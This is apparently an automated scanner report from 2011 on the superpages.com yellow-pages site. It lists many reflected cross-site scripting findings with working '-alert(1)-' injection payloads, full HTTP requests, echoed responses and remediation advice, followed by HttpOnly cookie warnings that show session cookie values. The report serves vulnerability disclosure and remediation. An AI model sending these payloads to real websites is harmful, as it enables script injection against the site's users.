GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56887 Date: Thu, 03 Feb 2011 17:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... om'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.103. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32667 Date: Thu, 03 Feb 2011 17:10:08 GMT Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64285 Date: Thu, 03 Feb 2011 17:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64190 Date: Thu, 03 Feb 2011 17:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /listings.jsp?C=florists HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mapbasedsearch/mapsearch.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=55EC977DD9EB67DCA2D0895C73715630; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 522 Date: Thu, 03 Feb 2011 17:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title> Superpages.com: Map</title> </head> <frameset framespacing="0" border="0" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /profile.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=34F8CD7F11AAE29FCDCADE0C5D2C054F; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56809 Date: Thu, 03 Feb 2011 17:09:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
